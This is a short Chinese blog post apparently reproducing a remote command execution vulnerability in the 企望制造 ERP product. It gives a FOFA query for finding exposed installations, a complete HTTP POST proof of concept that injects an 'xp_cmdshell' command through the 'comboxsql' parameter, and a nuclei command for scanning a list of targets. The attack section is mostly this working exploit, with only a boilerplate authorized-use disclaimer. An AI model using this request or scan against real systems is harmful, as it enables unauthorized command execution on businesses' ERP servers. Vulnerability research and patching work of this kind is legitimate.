正文

漏洞复现 企望制造erp系统存在远程命令执行漏洞

admin
admin V管理员 /0 评论 /101 阅读
0518
此篇文章发布距今已超过248天,您需要注意文章的内容或图片是否可用!

0x01 阅读须知

云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞描述

企望制造ERP系统是畅捷通集团旗下的产品,为广大企业的管理创造了更多的价值,企望制造erp系统存在远程命令执行漏洞

0x03 漏洞复现

fofa-qeury: title="企望制造ERP系统"

1.执行poc,进行输出hello qiwang erp,得到结果

POST /mainFunctions/comboxstore.action HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 43comboxsql=exec%20xp_cmdshell%20'echo hello qiwang erp'

2.nuclei验证脚本已发表于知识星球

nuclei.exe -t qiwang-erp-comboxstore-rce.yaml -l subs.txt -stats



推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下